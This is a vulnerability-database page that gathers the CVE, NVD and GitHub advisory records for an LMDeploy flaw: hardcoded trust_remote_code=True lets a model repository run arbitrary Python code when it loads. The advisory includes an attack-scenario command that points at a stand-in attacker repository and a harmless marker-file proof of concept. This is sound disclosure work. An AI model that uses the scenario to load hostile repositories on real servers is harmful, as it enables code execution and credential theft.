Vulnerability-Lookup

CVE-2026-46432 (GCVE-0-2026-46432)

Vulnerability from cvelistv5 – Published: 2026-06-09 23:05 – Updated: 2026-06-09 23:05

Title

LMDeploy: Arbitrary code execution via hardcoded trust_remote_code=True in lmdeploy model initialization

Summary

LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, LMDeploy is vulnerable to arbitrary code execution through hardcoded "trust_remote_code=True" in multiple HuggingFace model-loading call sites. At time of publication, there are no publicly available patches.

Severity

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/InternLM/lmdeploy/security/adv…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
InternLM	lmdeploy	Affected: <= 0.12.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "lmdeploy",
          "vendor": "InternLM",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 0.12.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, LMDeploy is vulnerable to arbitrary code execution through hardcoded \"trust_remote_code=True\" in multiple HuggingFace model-loading call sites. At time of publication, there are no publicly available patches."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-09T23:05:38.876Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-m549-qq94-fvhg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-m549-qq94-fvhg"
        }
      ],
      "source": {
        "advisory": "GHSA-m549-qq94-fvhg",
        "discovery": "UNKNOWN"
      },
      "title": "LMDeploy: Arbitrary code execution via hardcoded trust_remote_code=True in lmdeploy model initialization"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-46432",
    "datePublished": "2026-06-09T23:05:38.876Z",
    "dateReserved": "2026-05-13T22:18:22.830Z",
    "dateUpdated": "2026-06-09T23:05:38.876Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-46432\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-10T00:16:53.557\",\"lastModified\":\"2026-06-10T00:16:53.557\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, LMDeploy is vulnerable to arbitrary code execution through hardcoded \\\"trust_remote_code=True\\\" in multiple HuggingFace model-loading call sites. At time of publication, there are no publicly available patches.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-m549-qq94-fvhg\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-46432

Vulnerability from fkie_nvd - Published: 2026-06-10 00:16 - Updated: 2026-06-10 00:16

Severity

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/InternLM/lmdeploy/security/advisories/GHSA-m549-qq94-fvhg

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, LMDeploy is vulnerable to arbitrary code execution through hardcoded \"trust_remote_code=True\" in multiple HuggingFace model-loading call sites. At time of publication, there are no publicly available patches."
    }
  ],
  "id": "CVE-2026-46432",
  "lastModified": "2026-06-10T00:16:53.557",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-10T00:16:53.557",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-m549-qq94-fvhg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-M549-QQ94-FVHG

Vulnerability from github – Published: 2026-05-21 17:30 – Updated: 2026-05-21 17:30

Summary

LMDeploy: Arbitrary code execution via hardcoded trust_remote_code=True in lmdeploy model initialization

Details

Summary

lmdeploy hardcodes trust_remote_code=True in multiple HuggingFace model-loading call sites.

The affected code paths are in:

lmdeploy/archs.py
lmdeploy/utils.py
````

The vulnerable call sites pass `trust_remote_code=True` into HuggingFace Transformers APIs such as `AutoConfig.from_pretrained()`, `PretrainedConfig.get_config_dict()`, and `GenerationConfig.from_pretrained()`.

Because the model path is supplied by the operator or deployment configuration, an attacker who can control the `model_path` used by an lmdeploy serving process can point it to an attacker-controlled HuggingFace model repository. When lmdeploy starts and initializes the model, Transformers may download and execute remote Python code from that repository.

Successful exploitation results in arbitrary code execution with the privileges of the lmdeploy serving process.

## Affected version

Confirmed affected:

```text
lmdeploy <= 0.12.3

The issue was verified on v0.12.3 and on main.

Vulnerable code

Confirmed call sites:

lmdeploy/archs.py:154
AutoConfig.from_pretrained(..., trust_remote_code=True)

lmdeploy/archs.py:157
PretrainedConfig.get_config_dict(..., trust_remote_code=True)

lmdeploy/utils.py:225
GenerationConfig.from_pretrained(..., trust_remote_code=True)

The vulnerable pattern is:

AutoConfig.from_pretrained(model_path, trust_remote_code=True)

and:

GenerationConfig.from_pretrained(path, trust_remote_code=True)

The risk is that trust_remote_code=True is enabled unconditionally. Users are not required to explicitly opt in through a CLI flag or configuration option.

Attack scenario

An attacker obtains the ability to control or modify the model path used by an lmdeploy deployment. Examples include deployment configuration access, CI/CD configuration access, Kubernetes or container configuration access, or a managed environment where users can submit model IDs for serving.
The attacker sets the model path to an attacker-controlled HuggingFace repository, for example:

attacker-org/malicious-model

The lmdeploy serving process starts with that model path:

lmdeploy serve api_server attacker-org/malicious-model

During model initialization, lmdeploy calls HuggingFace Transformers APIs with trust_remote_code=True.
Transformers loads and executes remote Python code from the attacker-controlled model repository.
The payload runs with the privileges of the lmdeploy serving process.

Why this is security-sensitive

trust_remote_code=True is a dangerous HuggingFace option because it allows model repositories to execute custom Python code during model loading.

In lmdeploy, this option is hardcoded at multiple call sites. This removes the explicit trust decision from the user or deployment operator. A safer design would require an explicit CLI flag or configuration option such as --trust-remote-code.

lmdeploy is commonly used as a model serving daemon. The serving process may have access to model weights, GPU resources, API credentials, cloud credentials, request data, and internal network resources.

Proof of concept

The following PoC demonstrates the vulnerable primitive in a local, non-destructive way. It simulates lmdeploy calling a HuggingFace model-loading path with trust_remote_code=True and shows that remote model code would execute during initialization.

#!/usr/bin/env python3
from __future__ import annotations

import argparse
import importlib.util
import os
import sys
import tempfile
from pathlib import Path

MARKER = Path("/tmp/LMDEPLOY_TRUST_REMOTE_CODE_RCE_PROOF")
MALICIOUS_MODEL = "attacker-org/malicious-model"


def simulate_lmdeploy_model_load(model_path: str) -> None:
    """
    Simulates lmdeploy model initialization where trust_remote_code=True is hardcoded.

    Real vulnerable pattern:
        AutoConfig.from_pretrained(model_path, trust_remote_code=True)
        GenerationConfig.from_pretrained(path, trust_remote_code=True)

    When trust_remote_code=True, a malicious HuggingFace model repository can
    execute custom Python code during loading.
    """

    fake_model_dir = Path(tempfile.mkdtemp(prefix="fake_lmdeploy_model_"))
    module_name = model_path.split("/")[-1].replace("-", "_")
    modeling_file = fake_model_dir / f"modeling_{module_name}.py"

    payload = f'''
import os
from pathlib import Path

Path("{MARKER}").write_text(
    "lmdeploy trust_remote_code execution confirmed\\n"
    f"model_path={model_path!r}\\n"
    f"pid={{os.getpid()}} euid={{os.geteuid()}}\\n"
)
'''
    modeling_file.write_text(payload)

    spec = importlib.util.spec_from_file_location(f"modeling_{module_name}", modeling_file)
    assert spec is not None and spec.loader is not None

    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)


def main() -> int:
    parser = argparse.ArgumentParser()
    parser.add_argument("--model-id", default=MALICIOUS_MODEL)
    args = parser.parse_args()

    if MARKER.exists():
        MARKER.unlink()

    print(f"[*] Simulating lmdeploy loading model: {args.model_id}")
    print("[*] trust_remote_code=True is hardcoded in lmdeploy model-loading paths")

    simulate_lmdeploy_model_load(args.model_id)

    if MARKER.exists():
        print("[+] Code execution confirmed")
        print(MARKER.read_text())
        return 0

    print("[-] Marker file was not created", file=sys.stderr)
    return 1


if __name__ == "__main__":
    raise SystemExit(main())

Expected result:

[+] Code execution confirmed

The marker file is written to:

/tmp/LMDEPLOY_TRUST_REMOTE_CODE_RCE_PROOF

Impact

An attacker who can control the model path used by an lmdeploy deployment can execute arbitrary Python code during model initialization.

The attacker may be able to:

Read files accessible to the lmdeploy process.
Access environment variables, model provider credentials, HuggingFace tokens, cloud credentials, and API keys.
Modify model-serving behavior or tamper with responses.
Execute arbitrary operating-system commands.
Access request data or internal service credentials available to the serving process.
Cause denial of service by crashing or destabilizing the serving daemon.
Pivot to internal services reachable from the lmdeploy host or container.

Severity

7.8 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "lmdeploy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46432"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T17:30:57Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nlmdeploy hardcodes `trust_remote_code=True` in multiple HuggingFace model-loading call sites.\n\nThe affected code paths are in:\n\n```text\nlmdeploy/archs.py\nlmdeploy/utils.py\n````\n\nThe vulnerable call sites pass `trust_remote_code=True` into HuggingFace Transformers APIs such as `AutoConfig.from_pretrained()`, `PretrainedConfig.get_config_dict()`, and `GenerationConfig.from_pretrained()`.\n\nBecause the model path is supplied by the operator or deployment configuration, an attacker who can control the `model_path` used by an lmdeploy serving process can point it to an attacker-controlled HuggingFace model repository. When lmdeploy starts and initializes the model, Transformers may download and execute remote Python code from that repository.\n\nSuccessful exploitation results in arbitrary code execution with the privileges of the lmdeploy serving process.\n\n## Affected version\n\nConfirmed affected:\n\n```text\nlmdeploy \u003c= 0.12.3\n```\n\nThe issue was verified on `v0.12.3` and on `main`.\n\n## Vulnerable code\n\nConfirmed call sites:\n\n```text\nlmdeploy/archs.py:154\nAutoConfig.from_pretrained(..., trust_remote_code=True)\n\nlmdeploy/archs.py:157\nPretrainedConfig.get_config_dict(..., trust_remote_code=True)\n\nlmdeploy/utils.py:225\nGenerationConfig.from_pretrained(..., trust_remote_code=True)\n```\n\nThe vulnerable pattern is:\n\n```python\nAutoConfig.from_pretrained(model_path, trust_remote_code=True)\n```\n\nand:\n\n```python\nGenerationConfig.from_pretrained(path, trust_remote_code=True)\n```\n\nThe risk is that `trust_remote_code=True` is enabled unconditionally. Users are not required to explicitly opt in through a CLI flag or configuration option.\n\n## Attack scenario\n\n1. An attacker obtains the ability to control or modify the model path used by an lmdeploy deployment. Examples include deployment configuration access, CI/CD configuration access, Kubernetes or container configuration access, or a managed environment where users can submit model IDs for serving.\n2. The attacker sets the model path to an attacker-controlled HuggingFace repository, for example:\n\n```text\nattacker-org/malicious-model\n```\n\n3. The lmdeploy serving process starts with that model path:\n\n```bash\nlmdeploy serve api_server attacker-org/malicious-model\n```\n\n4. During model initialization, lmdeploy calls HuggingFace Transformers APIs with `trust_remote_code=True`.\n5. Transformers loads and executes remote Python code from the attacker-controlled model repository.\n6. The payload runs with the privileges of the lmdeploy serving process.\n\n## Why this is security-sensitive\n\n`trust_remote_code=True` is a dangerous HuggingFace option because it allows model repositories to execute custom Python code during model loading.\n\nIn lmdeploy, this option is hardcoded at multiple call sites. This removes the explicit trust decision from the user or deployment operator. A safer design would require an explicit CLI flag or configuration option such as `--trust-remote-code`.\n\nlmdeploy is commonly used as a model serving daemon. The serving process may have access to model weights, GPU resources, API credentials, cloud credentials, request data, and internal network resources.\n\n## Proof of concept\n\nThe following PoC demonstrates the vulnerable primitive in a local, non-destructive way. It simulates lmdeploy calling a HuggingFace model-loading path with `trust_remote_code=True` and shows that remote model code would execute during initialization.\n\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport argparse\nimport importlib.util\nimport os\nimport sys\nimport tempfile\nfrom pathlib import Path\n\nMARKER = Path(\"/tmp/LMDEPLOY_TRUST_REMOTE_CODE_RCE_PROOF\")\nMALICIOUS_MODEL = \"attacker-org/malicious-model\"\n\n\ndef simulate_lmdeploy_model_load(model_path: str) -\u003e None:\n    \"\"\"\n    Simulates lmdeploy model initialization where trust_remote_code=True is hardcoded.\n\n    Real vulnerable pattern:\n        AutoConfig.from_pretrained(model_path, trust_remote_code=True)\n        GenerationConfig.from_pretrained(path, trust_remote_code=True)\n\n    When trust_remote_code=True, a malicious HuggingFace model repository can\n    execute custom Python code during loading.\n    \"\"\"\n\n    fake_model_dir = Path(tempfile.mkdtemp(prefix=\"fake_lmdeploy_model_\"))\n    module_name = model_path.split(\"/\")[-1].replace(\"-\", \"_\")\n    modeling_file = fake_model_dir / f\"modeling_{module_name}.py\"\n\n    payload = f\u0027\u0027\u0027\nimport os\nfrom pathlib import Path\n\nPath(\"{MARKER}\").write_text(\n    \"lmdeploy trust_remote_code execution confirmed\\\\n\"\n    f\"model_path={model_path!r}\\\\n\"\n    f\"pid={{os.getpid()}} euid={{os.geteuid()}}\\\\n\"\n)\n\u0027\u0027\u0027\n    modeling_file.write_text(payload)\n\n    spec = importlib.util.spec_from_file_location(f\"modeling_{module_name}\", modeling_file)\n    assert spec is not None and spec.loader is not None\n\n    mod = importlib.util.module_from_spec(spec)\n    spec.loader.exec_module(mod)\n\n\ndef main() -\u003e int:\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--model-id\", default=MALICIOUS_MODEL)\n    args = parser.parse_args()\n\n    if MARKER.exists():\n        MARKER.unlink()\n\n    print(f\"[*] Simulating lmdeploy loading model: {args.model_id}\")\n    print(\"[*] trust_remote_code=True is hardcoded in lmdeploy model-loading paths\")\n\n    simulate_lmdeploy_model_load(args.model_id)\n\n    if MARKER.exists():\n        print(\"[+] Code execution confirmed\")\n        print(MARKER.read_text())\n        return 0\n\n    print(\"[-] Marker file was not created\", file=sys.stderr)\n    return 1\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```\n\nExpected result:\n\n```text\n[+] Code execution confirmed\n```\n\nThe marker file is written to:\n\n```text\n/tmp/LMDEPLOY_TRUST_REMOTE_CODE_RCE_PROOF\n```\n\n## Impact\n\nAn attacker who can control the model path used by an lmdeploy deployment can execute arbitrary Python code during model initialization.\n\nThe attacker may be able to:\n\n* Read files accessible to the lmdeploy process.\n* Access environment variables, model provider credentials, HuggingFace tokens, cloud credentials, and API keys.\n* Modify model-serving behavior or tamper with responses.\n* Execute arbitrary operating-system commands.\n* Access request data or internal service credentials available to the serving process.\n* Cause denial of service by crashing or destabilizing the serving daemon.\n* Pivot to internal services reachable from the lmdeploy host or container.",
  "id": "GHSA-m549-qq94-fvhg",
  "modified": "2026-05-21T17:30:57Z",
  "published": "2026-05-21T17:30:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-m549-qq94-fvhg"
    },
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/pull/4511"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/InternLM/lmdeploy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LMDeploy: Arbitrary code execution via hardcoded trust_remote_code=True in lmdeploy model initialization"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-46432 (GCVE-0-2026-46432)

FKIE_CVE-2026-46432

GHSA-M549-QQ94-FVHG

Summary

Vulnerable code

Attack scenario

Why this is security-sensitive

Proof of concept

Impact

Tags

Sightings

Nomenclature